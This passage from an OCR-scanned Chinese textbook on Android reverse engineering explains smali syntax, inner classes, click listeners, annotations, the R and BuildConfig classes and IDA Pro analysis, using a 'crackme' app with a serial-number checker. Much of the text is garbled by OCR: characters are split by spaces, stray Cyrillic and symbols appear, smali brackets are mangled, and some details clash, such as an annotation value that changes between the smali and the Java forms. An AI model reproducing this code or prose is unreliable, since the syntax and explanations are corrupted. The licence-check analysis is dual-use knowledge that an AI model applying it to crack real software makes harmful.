iget-object v0, ро, Lcom/guan/crackme/MainActivity;->btnAnno:Landroid/widget/Button; 


new-instance v1, Lcom/guan/crackme/MainActivity$ 1; 
invoke-direct (v1, p0}, Lcom/guan/crackme/MainActivity$1 ;-><init>(Lcom/guan/crackme/MainActivity;)V 
invoke-virtual (vO, v1), Landroid/widget/Button;->setOnClickListener(Landroid/view/View$OnClickListener;)V 


line 40 
iget-object v0, ро, Lcom/guan/crackme/MainActivity;->btn CheckSN:Landroid/widget/Button; 


new-instance v1, Lcom/guan/crackme/MainActivity$2; 


invoke-direct (v1, p0}, Lcom/guan/crackme/MainActivity$2;-» «init» (Lcom/guan/crackme/MainActivity;)V 
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invoke-virtual (v0, v1), Landroid/widget/Button;->setOnClickListener(Landroid/view/View$OnClickListener;)V 


ine 50 
return-void 
.end method 
.method public onCreateOptionsMenu(Landroid/view/Menu;)Z 


locals 2 
parameter "menu" 


.prologue 
line 77 
invoke-virtual {p0}, Lcom/guan/crackme/MainActivity;-»getMenulnflater()Landroid/view/Menulnflater; 


move-result-object vO 
const/high16 v1, 0x7f07 


invoke-virtual (vO, v1, p1}, Landroid/view/Menulnflater;-»inflate(ILandroid/view/Menu;)V 


line 78 
const/4 vO, 0х1 


return vO 
.end method 


13.3.2 分 析 演 示 文 件 


在 13.3.1 节 的 演示 代码 中 ， 第 1 行 代码 中 的 .class 指令 指定 了 当前 类 的 类 名 。 本 实例 类 的 访问 权限 是 
public， 其 类 名 为 Leom/guan/crackme/MainActivity;， 类 名 开头 的 字符 L 遵循 了 Dalvik VM 字 节 码 的 约定 规 
则 ， 表 示 后 面 跟随 的 字符 串 为 一 个 类 。 

第 2 行 代码 中 的 .super 指令 设置 了 当前 类 的 父 类 ， 本 实例 的 Lcom/guan/crackmeMainActivity; 的 父 类 为 
Landroid/app/Activity;。 

第 3 行 代码 中 的 .source 指令 设置 了 当前 类 的 源 文件 名 。 

由 此 可 见 ，Smali 文件 和 DEX 文件 是 息息相关 的 ，DEX 文件 的 DexClassDef 结构 描述 了 一 个 类 的 详细 
信息 , 结构 中 的 第 1 个 字段 classIdx 是 类 的 类 型 索引 , 第 3 个 字段 superclassIdx 是 指向 类 的 父 类 类 型 索引 ， 
第 5 个 字段 sourceFileldx 是 指向 类 的 源 文件 名 的 字符 串 索 引 。 

前 3 行 代码 后 的 代码 部 分 就 是 整个 类 的 主体 部 分 , 一 个 Android 程序 类 可 以 由 多 个 字段 或 方法 组 成 。 在 
Smali 文件 中 ， 使 用 .field 指令 声明 字段 。 字 段 有 静态 字段 和 实例 字段 两 种 ， 具 体 说 明 如 下 所 示 。 

(1) 静态 字段 的 声明 格式 如 下 。 

# static fields 

-field < 访问 权限 > static [修饰 关键 字 ] < 字段 名 >:< 字 段 类 型 > 

当 baksmali 生成 Smali 文件 时 , 会 在 静态 字段 声明 的 起 始 处 洪 加 static fields 注释 。 可 以 发 现 ,在 Smali 
文件 中 的 注释 与 Dalvik VM 中 的 语法 一 样 ， 都 是 以 “#” 开 头 。 在 .field 指令 后 会 紧 跟 “访问 权限 ”指令 ， 这 
里 的 访问 权限 可 以 是 public、private、protected。“ 修 饰 关键 字 ” 描 述 了 字段 的 其 他 属性 ， 例 如 synthetic. 
指令 的 最 后 是 “字段 名 ”和 “字段 类 型 ”， 使 用 冒号 “: ”进行 分 隔 ， 其 语法 与 Dalvik VM 是 一 样 的 。 

(2) 实例 字段 的 声明 与 静态 字段 类 似 ， 只 是 少 了 static 关键 字 ， 其 具体 格式 如 下 所 示 。 


ез 


# instance fields 
field < 访问 权限 > [修饰 关键 字 ] < 字段 名 >:< 字 段 类 型 > 
例如 ， 下 面 的 代码 是 实例 字段 声明 。 
# instance fields 
field private btnAnno:Landroid/widget/Button; 
在 上 述 代 码 中 ， 第 1 行 代 码 instance fields 是 baksmali 生成 的 注释 ， 第 2 行 代码 表示 一 个 私有 字段 
btnAnno， 其 类 型 为 Landroid/widget/Button;。 
如 果 在 一 个 Android 类 中 含有 方法 , 那么 在 这 个 类 中 肯定 会 包含 相关 方法 的 反 汇 编 代 码 。 在 Smali 文件 
中 ， 使 用 .method 指令 来 声明 一 个 方法 。 这 里 的 方法 有 直接 方法 与 虚 方法 两 种 ， 具 体 说 明 如 下 所 示 。 
(OD 直接 方法 的 声明 格式 如 下 所 示 。 
#direct methods 
.method < 访问 权限 > [修饰 关键 字 ] < 方法 原型 > 
<.locals> 
[.parameter] 
[.prologue] 
[line] 
< 代码 体 > 
.end method 
Q direct methods: 是 baksmali 添加 的 注释 ， 访 问 权 限 和 修饰 关键 字 与 字段 的 描述 相同 ， 方 法 原型 描述 
了 方法 的 名 称 、 参 数 与 返回 值 。 
口 .locals: 指定 了 使 用 的 局 部 变量 的 个 数 。 
0 parameter: 指定 了 方法 的 参数 ， 与 Dalvik VM 语 法 中 使 用 .parameters 指 定 参 数 个 数 ， 每 个 .parameter 
指令 表明 使 用 一 个 参数 ， 若 在 方法 中 使 用 了 3 个 参数 ， 则 会 出 现 3 条 .parameter 指 令 。 
O prologue: 指定 了 代码 的 开始 处 ， 混 淆 过 的 代码 可 能 去 掉 了 该 指令 。 
O dine: 指定 了 该 处 指令 在 源 代 码 中 的 行 号 ， 同 理 ， 混 淆 过 的 代码 可 能 去 除了 行 号 信息 。 
(2) 声明 虚 方 法 的 格式 与 声明 直接 方法 的 相同 ， 只 是 起 始 处 的 注释 为 virtual methods。 如 果 某 一 个 类 
实现 了 接口 ， 则 会 在 Smali 文件 中 使 用 .implements 指令 来 声明 ， 有 具体 声明 格式 如 下 所 示 。 
# interfaces 
implements < 接口 名 > 
口 #interfaces: 是 baksmali INHI TER. 
Q implements: 是 接口 关键 字 ， 其 后 的 接口 名 是 DexClassDef 结 构 中 interfacesOff 字段 指定 的 内 容 。 


m 


当 一 个 类 使 用 了 注解 时 ， 会 在 Smali 文件 中 使 用 .annotation 指令 进行 声明 ， 声 明 注解 的 语法 格式 如 


下 所 示 。 
# annotations 
.annotation [注解 属性 ] < 注解 类 名 > 
[注解 字段 = fü] 
.end annotation 


在 Android 程序 中 ， 注 解 的 作用 范围 可 以 是 类 、 方 法 或 字段 。 如 果 注 解 的 作用 范围 是 类 ， 则 .annotation 
指令 会 直接 在 Smali 文件 中 定义 。 如 果 是 方法 或 字段 ， 则 会 在 方法 或 字段 定义 中 包含 .annotation 指令 ， 例 如 
下 面 的 演示 代码 。 

# instance fields 

field public sayWhat:Ljava/lang/String; 

„annotation runtime Lcom/guan/anno/MyAnnoField; 
info = "Hello aaa" 
.end annotation 
.end field 


e 
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在 上 述 代码 中 ， 实 例 字 段 sayWhat 是 一 个 String 类 型 ， 使 用 了 com.guan.anno.MyAnnoField 注解 ， 注 
解 字段 info 值 是 Hello aaa。 将 其 转换 为 Java 代码 的 结果 是 : 
@ com.guan.anno MyAnnoField(info = "Hello my friend") 
public String sayWhat; 


注意 : 有 关 Smali 语 言 方面 的 知识 ， 请 参阅 Gabor Paller 所 写 的 Dalvik opcodes— X. 


13.4 分 析 内 部 类 


Би 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 13 章 \ 分 析 内 部 类 .avi 

在 Java 程序 中 可 以 在 一 个 类 的 内 部 定义 另 一 个 类 ， 这 种 在 一 个 类 中 定义 的 类 被 称 为 内 部 类 Сапег 
Class)。 可 以 对 Java 内 部 类 进一步 细 分 ,分 为 成 员 内 部 类 、 静 态 嵌 套 类 、 方 法 内 部 类 和 匿名 内 部 类 。 当 baksmali 
反 编 译 DEX 文件 时 ， 会 为 每 个 类 单独 生成 一 个 对 应 的 Smali 文件 ， 内 部 类 将 作为 一 个 独立 的 类 而 拥有 自己 
独立 的 Smali 文件 ， 此 时 内 部 类 文件 名 的 格式 如 下 所 示 。 

[外 部 类 ]$[ 内 部 类 ].smali 

例如 如 下 所 示 的 类 。 

class Outer { 

class Іппег{ } 


ў 

在 反 编 译本 实例 的 APK 文件 后 ， 会 在 smali/com/guan/crackme 目录 中 发 现 文件 MainActivity$ SNChecker.smali, 
此 处 的 SNChecker 就 表示 是 MainActivity 的 一 个 内 部 类 。 打 开 文 件 MainActivity$ SNChecker.smali， 其 具体 
代码 如 下 所 示 。 

.class public Lcom/guan/crackme/MainActivity$SNChecker; 

.Super Ljava/lang/Object; 

.source "MainActivity.java" 


3t annotations 

.annotation system Ldalvik/annotation/EnclosingClass; 
value = Lcom/guan/crackme/MainActivity; 

.end annotation 


.annotation system Ldalvik/annotation/InnerClass; 
accessFlags = 0х1 
name = "SNChecker" 

.end annotation 


# instance fields 
field private sn:Ljava/lang/String; 
field final synthetic this$0:Lcom/guan/crackme/MainActivity; 


# direct methods 
-method public constructor <init>(Lcom/guan/crackme/MainActivity;Ljava/lang/String;)V 
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locals 0 
.parameter 
.parameter "sn" 


.prologue 

ine 83 

iput-object p1, ро, Lcom/guan/crackme/MainActivity$SNChecker;->this$0:Lcom/guan/crackme/MainActivity; 
invoke-direct (pO), Ljava/lang/Object;-><init>()V 


line 84 
iput-object p2, p0, Lcom/guan/crackme/MainActivity$SNChecker;-» sn:Ljava/lang/String; 


Ліпе 85 


return-void 
.end method 


# virtual methods 
.method public isRegistered()Z 
locals 10 


.prologue 
const/16 v9, 0x8 


const/4 v7, 0x0 


Jine 88 
const/4 v4, 0x0 


line 89 

local v4, result:Z 

const/4 v0, 0x0 

ine 90 

local vO, ch:C. 

const/4 v6, 0x0 

ine 91 

local v6, sum:l 

iget-object v8, p0, Lcom/guan/crackme/MainActivity$SNChecker;-»sn:Ljava/lang/String; 
if-eqz v8, :cond 0 

iget-object v8, p0, Lcom/guan/crackme/MainActivity$SNChecker;-»sn:Ljava/lang/String; 
invoke-virtual (v8), Ljava/lang/String;->length()I 


move-result v8 


if-ge v8, v9, :cond 1 
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:cond 0 
move v5, v4 


Ліпе 126 

.end local v4 #result:Z 

Лоса! v5, result:l 

:goto 0 

return v5 

ine 92 

.end local v5 #result:! 

-restart local v4 #result:Z 

:cond 1 

iget-object v8, p0, Lcom/guan/crackme/MainActivity$SNChecker;-»sn:Ljava/lang/String; 
invoke-virtual (v8), Ljava/lang/String;-»length()I 
move-result v3 

ine 93 

„local v3, len:l 

if-ne v3, v9, :cond 3 


line 94 
iget-object v8, p0, Lcom/guan/crackme/MainActivity$SNChecker;-»sn:Ljava/lang/String; 


invoke-virtual (v8, v7}, Ljava/lang/String;->charAt(I)C 
move-result vO 


Jine 95 
sparse-switch vO, :sswitch data 0 


Ліпе 101 
const/4 v4, 0x0 


line 104 
:goto 1 
if-eqz v4, :cond 2 


Jine 105 
iget-object v7, p0, Lcom/guan/crackme/MainActivity$SNChecker;-»sn:Ljava/lang/String; 


const/4 v8, 0x3 
invoke-virtual (v7, v8), Ljava/lang/String;->charAt(I)C 
move-result vO 


Ліпе 106 
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packed-switch v0, :pswitch data 0 


Jine 115 
const/4 v4, 0x0 


:cond 2 
:goto 2 
move v5, v4 


Jine 126 
-restart local v5 #result:l 
goto :goto 0 


Ліпе 98 

.end local v5 #result:! 
:SSswitch 0 

const/4 v4, Ox1 


line 99 
goto :goto 1 


line 112 
:pswitch 0 
const/4 v4, Ox1 


line 113 
goto :goto 2 


line 119 

:cond 3 

const/16 v8, 0x10 
if-ne v3, v8, :cond 2 


Jine 120 
const/4 v2, 0x0 


local v2, i:l 
:goto 3 
if-It v2, v3, :cond 4 


line 124 
rem-int/lit8 v8, v6, 0x6 


if-nez v8, :cond 5 
const/4 v4, Ox1 


:goto 4 
goto :goto 2 
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Jine 121 
:cond 4 
iget-object v8, p0, Lcom/guan/crackme/MainActivity$SNChecker;-»sn:Ljava/lang/String; 


invoke-virtual (v8, v2), Ljava/lang/String;-»charAt(I)C 
move-result v1 


Jine 122 
local v1, chPlus:C 
add-int/2addr v6, v1 


Jine 120 
add-int/lit8 v2, v2, 0x1 


goto :goto 3 


.end local v1 #chPlus:C 
:cond 5 
move v4, v7 


Jine 124 
goto :goto 4 


line 95 
:sswitch data 0 
-Sparse-switch 
0x61 -> :sswitch 0 
0x66 -> :sswitch 0 
.end sparse-switch 


Jine 106 
:pswitch data 0 
-packed-switch 0x31 
:pswitch 0 
:pswitch 0 
:pswitch 0 
:pswitch 0 
:pswitch 0 
.end packed-switch 
.end method 
在 上 述 代码 中 ， 有 如 下 两 个 注解 定义 块 : 
О Ldalvik/annotation/EnclosingClass; 
О Ldalvik/annotation/ InnerClass; 
有 如 下 两 个 实例 字段 : 
Q sn 
O this$0 
另外 还 有 一 个 直接 方法 init0 和 一 个 虚 方法 isRegistered(), 其 中 , sn 是 字符 串 类 型 , this$0 是 MainActivity 
类 型 ， 关 键 字 synthetic 的 作用 是 声明 它 是 “合成 ”的 。 而 this$0 是 内 部 类 自动 保留 的 一 个 指向 所 在 外 部 类 
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的 引用 。 其 中 ， 左 边 的 this 表示 为 父 类 的 引用 ， 右 边 的 数值 0 表示 引用 的 层 数 。 
接 下 来 开始 分 析 MainActivitySSNChecker 的 构造 函数 ， 其 初始 化 代码 如 下 所 示 。 
#direct methods 
.method public constructor 
<init>(Lcom/guan/crackme/MainActivity;Ljava/lang/String;)V 
locals 0 
.parameter # 第 一 个 参数 MainActivity 引用 
.parameter "sn" # 第 二 个 参数 字符 串 sn 
.prologue 
ine 83 
iput-object p1, p0, Lcom/guan/crackme/MainActivity$SNChecker; 
->this$0:Lcom/guan/crackme/MainActivity; # 将 MainActivity 引用 赋值 给 this$0 
invoke-direct (pO), Ljava/lang/Object;-><init>()V # 调 用 默认 的 构造 函数 
line 84 
iput-object p2, p0, Lcom/guan/crackme/MainActivity$SNChecker;-> 
sn:Ljava/lang/String; 
# 将 sn 字符 串 的 值 赋 给 sn 字段 
ine 85 
return-void 
.end method 
在 声明 上 述 代码 时 ， 在 表面 上 是 使 用 .parameter 指令 设置 了 两 个 参数 ， 但 是 实际 上 却 使 用 了 pO. pl 和 
p2 这 3 个 寄存 器 。 造 成 这 种 情况 的 原因 是 ， 对 于 一 个 非 静态 的 方法 来 说 会 隐 含 使 用 p0 寄存 器 作为 类 的 this 
引用 。 所 以 此 处 使 用 了 3 个 寄存 器 ， 有 具体 说 明 如 下 所 示 。 
Q p0: 表示 MainActivitySSNChecker 自 身 的 引用 。 
口 pl: 表示 MainActivity 的 引用 。 
О p: 表示 sn 字符 串 。 
除 此 之 外 ， 从 文件 MainActivitySSNCheckersmali 中 的 构造 函数 可 以 看 出 ， 初 始 化 内 部 类 的 基本 步骤 如 
下 所 示 。 
OD 在 本 类 的 一 个 synthetic 字段 中 保存 外 部 类 的 引用 ， 以 便 内 部 类 的 其 他 方法 中 使 用 这 些 引用 。 
(2) 调用 内 部 类 的 父 类 的 构造 函数 来 初始 化 父 类 。 
(3) 初始 化 内 部 类 本 身 。 


13.5 分 析 监 听 器 


Фа 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 13 章 \ 分 析 监听 器 .avi 

在 开发 Android 应 用 程序 的 过 程 中 ， 会 经 常用 到 监听 器 的 响应 处 理 功能 ， 例 如 ， 单 击 Button 控件 时 会 
触发 事件 响应 OnClickListener， 这 就 是 监听 器 业务 的 范畴 。 在 编写 Android 应 用 程序 的 过 程 中 ,通常 使 用 匿 
名 内 部 类 的 形式 实现 这 些 监听 功能 。 在 本 节 的 内 容 中 ， 将 详细 分 析 反 编译 后 的 监听 器 的 源码 内 容 。 


13.5.1 Android 监听 器 介绍 


在 Android 系统 中 ， 监 听 器 是 通过 接口 实现 的 ， 在 Android 4.4 源码 中 ， 可 以 在 文件 View.java 中 找到 
OnClickListener 监听 器 的 实现 代码 。 


e 
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frameworks/base/core/java/android/view/View.java 
public interface OnClickListener { 
pe 
* Called when a view has been clicked. 
* 


* @param v The view that was clicked. 
T 
void onClick(View v); 

} 

由 此 可 见 ， 要 想 实现 按钮 单 击 事件 的 监听 器 功能 ， 需 要 先 实现 View.OnClickListener 事件 中 的 onClick() 
方法 。 在 反 编 译本 实例 的 APK 文件 后 ， 可 以 在 文件 MainActivity.smali 的 OnCreate() 方 法 中 发 现实 现 按钮 单 
击 事件 监听 器 的 过 程 ， 具 体 实 现代 码 如 下 所 示 。 

.method public onCreate(Landroid/os/Bundle;)V 

locals 2 
parameter "savedinstanceState" 


line 32 
iget-object vO, ро, Lcom/guan/crackme/MainActivity;->btnAnno: 
Landroid/widget/Button; 
new-instance v1, Lcom/guan/crackme/MainActivity$1; # 新 建 一 个 MainActivity$1 实例 
invoke-direct {v1, p0), Lcom/guan/crackme/MainActivity$1; 
-><init>(Lcom/guan/crackme/MainActivity;)V # 初始 化 MainActivity$1 实例 
invoke-virtual (vO, v1), Landroid/widget/Button; 
->setOnClickListener(Landroid/view/View$OnClickListener;)V # 设置 按钮 单 击 事件 监听 器 
line 40 
iget-object vO, ро, Lcom/guan/crackme/MainActivity; 
->btnCheckSN:Landroid/widget/Button; 
new-instance v1, Lcom/guan/crackme/MainActivity$2; # 新 建 一 个 MainActivity$2 实例 
invoke-direct (v1, p0), Lcom/guan/crackme/MainActivity$2 
-><init>(Lcom/guan/crackme/MainActivity;)V; # 初始 化 MainActivity$2 实例 
invoke-virtual (v0, v1), Landroid/widget/Button; 
->setOnClickListener(Landroid/view/View$OnClickListener; Vi ig 38 Hk tA š r RF Ms Dr 88 
line 50 
return-void 
.end method 
在 上 述 代 码 中 ， 方 法 OnCreate() 调 用 了 按钮 的 setOnClickListener() 方 法 来 实现 单 击 事件 的 监听 器 ， 有 具体 
说 明 如 下 所 示 。 
О 第 一 个 按钮 传 入 了 一 个 MainActivityS1 对 象 的 引用 。 
О 第 二 个 按钮 : 传 入 了 一 个 MainActivityS2 对 象 的 引用 。 


13.5.2 分 析 反 编译 后 的 监听 器 


在 反 编译 后 的 目录 文件 中 ， 可 以 在 文件 MainActivity$1.smali 中 看 到 第 一 个 按钮 的 实现 ， 其 实现 代码 如 
下 所 示 。 

.class Lcom/guan/crackme/MainActivity$1; 

.Super Ljava/lang/Object; 

.source "MainActivity.java" 


DW Android Z 2 o 5 8i scit 


事件 


码 如 


# interfaces 
.implements Landroid/view/View$OnClickListener; 


# annotations 
.annotation system Ldalvik/annotation/EnclosingMethod; 

value = 
Lcom/guan/crackme/MainActivity;->onCreate(Landroid/os/Bundle;)V 
.end annotation 
.annotation system Ldalvik/annotation/InnerClass; 

accessFlags = 0x0 

name = null 
.end annotation 


# instance fields 
field final synthetic this$0:Lcom/guan/crackme/MainActivity; 


# direct methods 
.method constructor <init>(Lcom/guan/crackme/MainActivity;)V 


.end method 


# virtual methods 
.method public onClick(Landroid/view/View;)V 


.end method 
在 文件 MainActivitySl.smali 中 ， 在 开头 部 分 使 用 了 .implements 指令 ， 功 能 是 设置 此 类 实现 了 按钮 单 击 
的 监听 器 接口 ， 通 过 此 类 实现 了 其 OnClick() 方 法 。 


13.6 ”分析 注解 类 


ГЕ 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 13 章 \ 分 析 注解 类 .avi 

在 Android 应 用 程序 中 经 常用 到 注解 类 ， 其 中 最 为 常用 的 注解 包 有 如 下 两 个 。 

口 dalvik.annotation: 此 包 下 的 注解 不 对 外 开放 ， 仅 供 核心 库 与 代码 测试 使 用 ， 所 有 的 注解 声明 位 于 
Android 4.4 源 码 的 libcore/dalvik/src/main/java/dalvik/annotation 目 录 中 。 

口 android.annotation: 在 Android4.4 源 码 的 ffameworks/base/core/java/android/annotation 目 录 中 实现 注解 
声明 。 

在 .smali 格式 文件 中 可 以 发 现 注解 类 ， 例 如 ， 下 面 是 文件 MainActivity.smali 的 代码 片段 。 

# annotations 

.annotation system Ldalvik/annotation/MemberClasses; 
value ={ 

Lcom/guan/crackme/MainActivity$SNChecker; 


.end annotation 
在 上 述 代码 中 ，MemberClasses 就 是 一 个 注解 ， 这 是 在 编译 时 自动 添加 的 ， 类 MemberClasses 注解 的 源 
下 所 示 。 


@ 
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pt 
* A "system annotation" used to provide the MemberClasses list 
М. 
@Retention(RetentionPolicy.RUNTIME) 
@Target(ElementType.ANNOTATION TYPE) 
@interface MemberClasses { ) 
从 上 述 注释 可 以 看 出 ， 注 解 类 MemberClasses 是 一 个 系统 注解 ， 功 能 是 为 父 类 提供 一 个 MemberClasses 
列表 。 注 解 类 MemberClasses 是 子 类 成 员 集 合 ， 是 一 个 内 部 类 列表 。 
下 面 是 文件 MainActivity$1.smali 的 代码 片段 。 
# annotations 
.annotation system Ldalvik/annotation/EnclosingMethod; 
value = Lcom/guan/crackme/MainActivity;->onCreate(Landroid/os/ 
Bundle;)V 
.end annotation 
在 上 述 代码 中 , EnclosingMethod 也 是 一 个 注解 , 功能 是 说 明 类 MainActivityS1 的 作用 范围 .其 中 , Method 
表示 可 以 作用 于 一 个 方法 ， 而 注解 值 value 则 说 明 它 位 于 主 程序 MainActivity 的 方法 onCreate0 中 。 与 注解 
类 EnclosingMethod 相对 应 的 还 有 注解 类 EnclosingClass， 此 类 在 文件 MainActivity$SNChecker.smali 中 的 相 
关 代 码 片段 如 下 所 示 。 
#annotations 
.annotation system Ldalvik/annotation/EnclosingClass; 
value = Lcom/guan/crackme/MainActivity; 
.end annotation 


.annotation system Ldalvik/annotation/InnerClass; 
accessFlags = 0x1 
name = "SNChecker" 
.end annotation 
注解 类 EnclosingClass 的 功能 是 声明 MainActivitySSNChecker 作用 于 一 个 类 ， 注 解 值 value 表示 这 个 类 
是 MainActivity。 
除了 上 面 介绍 的 注解 类 之 外 ， 在 Android 系统 中 还 有 Signature 和 Throws 注解 。 其 中 ，Signature 注解 的 
功能 是 验证 方法 的 签名 , 例如 ,如 下 代码 中 的 onItemClick0 方 法 的 原型 与 Signature 注解 的 value 值 是 一 样 的 。 
.method public 
onltemClick(Landroid/widget/AdapterView;Landroid/view/View;lJ)V 
locals 6 
.parameter 
.parameter "v" 
.parameter "position" 
.parameter "id" 
.annotation system Ldalvik/annotation/Signature; 
value = ( 
G 
"Landroid/widget/AdapterView", 
"e>", 
"Landroid/view/View;", 
"ум" 
} 
.end annotation 


.end method 
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在 声明 一 个 Android 方法 的 过 程 中 ， 如 果 使 用 关键 字 throws 抛 出 了 一 个 异常 ， 那 么 会 对 应 地 生成 相应 
的 Throws 注解 。 例 如 如 下 所 示 的 代码 。 
.method public final get()Ljava/lang/Object; 
locals 1 
.annotation system Ldalvik/annotation/Throws; 
value - ( 
Ljava/lang/InterruptedException;, 
Ljava/util/concurrent/ExecutionException; 


.end annotation 


.end method 

在 上 述 代 码 中 ， 方 法 get() 抛 出 了 两 个 异常 : InterruptedException 和 ExecutionException， 将 其 转换 为 如 
下 所 示 的 Java 代码 。 

public final Object get() throws InterruptedException, ExecutionException { 


} 


SEB: 以 上 介绍 的 注解 都 是 自动 生成 的 ， 开 发 人 员 不 能 在 代码 中 添加 使 用 。 从 Android SDK r17 版 本 开 
始 ， 在 类 android.annotation 中 新 增加 了 SuppressLint 注解 ， 其 功能 是 帮助 开发 人 员 去 除 代码 检查 
器 (Lint API check ) 添加 的 警告 信息 。 假 如 在 代码 中 声明 了 一 个 没有 被 用 到 过 的 常量 ， 当 被 代 
码 检 查 器 检测 到 这 个 常量 后 ， 会 在 变量 所 在 的 代码 行 添加 警告 信息 ， 并 将 鼠标 指向 变量 并 停留 
片刻 。 


13.7 Android 独 有 的 自动 类 


Фи go RBM: 光盘 :视频 \ 知 识 点 \ 第 13 章 \Android 独 有 的 自动 类 .avi 
在 使 用 Eclipse ЖЖ Android 应 用 程序 时 ，Android SDK 会 自动 添加 一 些 类 。 在 发 布 Android 程序 后 , 这 
些 自动 生成 的 类 会 仍然 保留 在 APK 文件 中 。 例 如 ， 在 使 用 Android 4.4 时 会 生成 如 下 所 示 的 自动 类 。 
(1)R 类 
在 Android 工程 的 res 目录 下 的 每 个 资源 都 会 有 一 个 ID 值 ， 这 些 资源 的 类 型 可 以 是 字符 串 、 图 片 、 样 
式 、 颜 色 等 。 例 如 在 本 实例 中 ， 文 件 R.java 的 实现 代码 如 下 所 示 。 


package com.guan.crackme; 


public final class R{ 

public static final class attr { 

} 

public static final class dimen { 
public static final int padding_large=0x7f040002; 
public static final int padding medium-0x7f040001; 
public static final int padding small-0x7f040000; 

} 

public static final class drawable { 


public static final int ic_action_search=0x7f020000; 
public static final int ic_launcher=0x7f020001; 
@ 
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public static final class id ( 
public static final int btn_annotation=0x7f080000; 
public static final int btn_checksn=0x7f080002; 
public static final int edt sn-0x7f080001; 
public static final int menu settings-0x7f080003; 


public static final class layout ( 
public static final int activity main-0x71030000; 


public static final class menu ( 
public static final int activity main-0x71070000; 


} 

public static final class string ( 
public static final int app_name=0x7f050000; 
public static final int hello world=0x7f050001; 
public static final int menu settings-0x7f050002; 
public static final int title activity main=0x7f050003; 


} 
public static final class style { 

public static final int App Theme=0x7f060000; 
} 


} 

因为 上 述 资源 类 都 是 类 R 的 内 部 类 ， 所 以 都 会 独立 生成 一 个 类 文件 。 在 反 编 译 APK 文件 后 ， 在 结果 中 
可 以 发 现 很 多 文件 , 例如 , R.smali、 R$attr.smali、 RSdimen.smali、 RSdrawable.smali、 RSid.smali、 R$Slayout.smali、 
RSmenu.smali, RSstring.smali 和 RSstyle.smali. 

(2) BuildConfig 类 

BuildConfig 类 是 从 Android SDK r17 版 本 开始 洪 加 的 ， 在 此 类 中 只 有 一 个 boolean 类 型 的 名 为 DEBUG 
的 字段 ， 功 能 是 标识 程序 发 布 的 版 本 类 型 。DEBUG 字段 的 默认 值 是 tue， 表 示 程 序 以 调试 版 本 发 布 。 因 为 
类 BuildConfig 是 自动 生成 的 ， 所 以 如 果 想 将 其 改 为 false， 具 体 过 程 如 下 。 

О 进入 Eclipse 开发 环境 , 依次 选择 菜单 Project | Build Automatically 命 令 , 这样 会 关闭 自动 构建 功能 。 

口 依次 选择 菜单 Project | Clean。 

O 右 击 ， 在 弹出 的 快捷 菜单 中 依次 选择 Android Tools | Export Signed Application Package 导 出 程序 ， 

此 时 会 发 现 BuildConfig.DEBUG 的 值 变 为 false。 

(3) 注解 类 

如 果 在 Android 应 用 代码 中 使 用 了 SuppressLint 或 TargetApi 注解 ， 则 在 程序 中 会 包含 对 应 的 注解 类 ， 
这 样 经 过 反 编译 处 理 后 ， 会 在 smali/android/annotation 目录 下 生成 相应 的 Smali 文件 。 
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TEVESEBURPE SUR, SS OP TT ЕЗД EU IO B6 BOTT ETT TERE. БЕК. 
静态 分 析 工 作 和 代码 分 析 类 似 ， 例 如 ， 本 书 前 面 的 分 析 反 编译 文件 的 过 程 其 实 就 是 一 个 静态 分 析 的 过 程 。 
在 本 章 的 内 容 中 ,将 详细 讲解 使 用 第 三 方 工具 IDA Pro 静态 分 析 Android 反 编 译文 件 的 知识 ， 为 读者 学 习 本 
书后 面 的 知识 打下 基础 。 


14.1 使 用 IDA Pro 工具 反 编译 Android 文件 


- 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 14 章 \ 使 用 IDA Pro 工具 反 编译 Android 文件 .avi 


使 用 IDA Pro 工具 反 编 译 Android 文件 的 具体 实现 流程 如 下 所 示 。 
(1) 找到 本 实例 的 编译 文件 123.apk， 使 用 解压 工具 对 其 进行 解压 处 理 ， 如 图 14-1 所 示 。 
(2) HF IDA Pro 工具 ， 然 后 将 得 到 的 解压 文件 classes.dex 拖 动 到 IDA Pro 的 主 窗口 ， 此 时 会 自动 弹 
出 加 载 新 文件 的 对 话 框 ， 如 图 14-2 所 示 。 
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G 324.724 134,684 DEX УЕ 2012/11/12 3HPC9)61 Г Loser з 
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图 14-1 解压 编译 文件 123.apk 图 14-2 加载 新 文件 对 话 杠 


由 图 14-2 所 示 的 对 话 框 可 知 ,通过 使 用 IDA Pro 工具 可 以 解析 出 文件 classes.dex 属于 Android DEX File, 
保持 默认 的 选项 ， 单 击 OK 按钮 后 就 会 开始 分 析 DEX 文件 。 分 析 完 成 后 的 界面 如 图 14-3 所 示 。 
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图 14-3 分 析 完成 后 的 效果 


(3) BIA IDA Pro 支持 结构 化 形式 显示 数据 结构 , 并且 Android __ 
的 大 多 数 DEX 文件 的 数据 结构 被 保存 在 Android 源码 文件 mw 
dalvik/libdex/DexFile.h 中 , 通过 依次 选择 IDA Pro 菜单 项 File | IBC без. б 
file, 然后 选择 dex.idc 的 操作 可 以 将 文件 DexFile.h 转 换 为 .idc 脚本 ， `ñ 
这 样 做 便于 在 IDA Pro 工 具 中 的 参考 分 析 工 作 。 本 实例 使 用 IDA Pro @ mc EE 
工具 将 文件 DexFile.h 转换 为 文件 test.idc， 如 图 14-4 所 示 。 pue 

(4) 选择 IDA View-A 选项 卡 , 来 到 反 汇 编 代 码 界面 ， 然 后 依 
次 选择 Jump | Jump to address 命令 ， 如 图 14-5 所 示 ， 将 弹出 地 址 图 144 导入 ,idc 脚本 
跳 转 对 话 框 。 
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14-5 打开 地 址 跳 转 对 话 框 
(5) 在 图 14-6 所 示 的 地 址 跳 转 对 话 框 输入 0， 然 后 单 击 OK 按钮 ， 这 样 可 以 确保 让 IDA Pro 跳 转 到 文 


D 
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fF. classes.dex 的 起 始 位 置 。 
(6) 将 鼠标 定位 到 注释 segment byte public 'CODE' use32 所 在 的 AX 
行 ， 然 后 选择 Edit | Struct var 命令 后 弹出 选择 结构 类 型 对 话 框 。 nn E 


(7) IDA Pro 将 文件 classes.dex 分 成 了 9 个 部 分 ， 其 中 前 7 个 部 
分 由 结构 DexHeader 提供 ， 最 后 两 个 段 可 以 通过 计算 得 出 。 ГЕ | [==] 


在 文件 classes.dex 中 包含 了 多 个 方法 , 可 以 通过 选择 Exports 选项 图 146 输入 0 
卡 的 方式 来 查看 详情 。 各 个 方法 的 命名 方式 遵循 了 如 下 规则 。 
ЖА. 方法 名 @ 方 法 声明 
